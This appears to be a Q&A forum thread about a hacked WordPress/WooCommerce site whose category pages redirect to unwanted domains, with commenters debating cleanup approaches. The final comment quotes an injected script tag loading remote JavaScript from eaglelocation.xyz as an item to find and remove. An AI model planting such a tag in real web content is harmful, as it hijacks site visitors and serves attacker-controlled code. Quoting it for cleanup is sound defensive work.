# How to fix the woocommerce - adaranth.com redirection issue

Tags: plugins, redirect

I have faced some redirect issue regarding my wordpress site.

My wordpress site product category pages redirect to some unwanted sites (adaranth.com and some other site)

Anyone let me know how to fix the redirect issue.

Comment: It seems, your site has been hacked. Try security plugin and scan WordPress files and database for malware injection.

Comment: @Aparna_29 using security plugins when the site is already infected doesn’t make much sense - malware can easily cheat and modify results of such scan...

Comment: @KrzysiekDróżdż, it depends on the type of malware injected. He can at least start with the plugin and if malware still exists, then he can try some better solution.

Comment: @Aparna_29 from my experience using so called "security plugins" to clean an infection is just a waste of time. It rarely detects all backdoors on server and every plugin I know makes a lot of mess in the DB of your site (and no - they never clean that mess after removing them). So no - I wouldn't recommend to use a security plugin on infected site - clean it properly.

Comment: @kanewillian: Review in each post, some script inside the content like `<script src=“https://eaglelocation.xyz/stats.js?l=l&amp;” type=“text/javascript”></script><script src=“https://eaglelocation.xyz/stats.js?l=l&amp;” type=“text/javascript”></script>`  And remove it.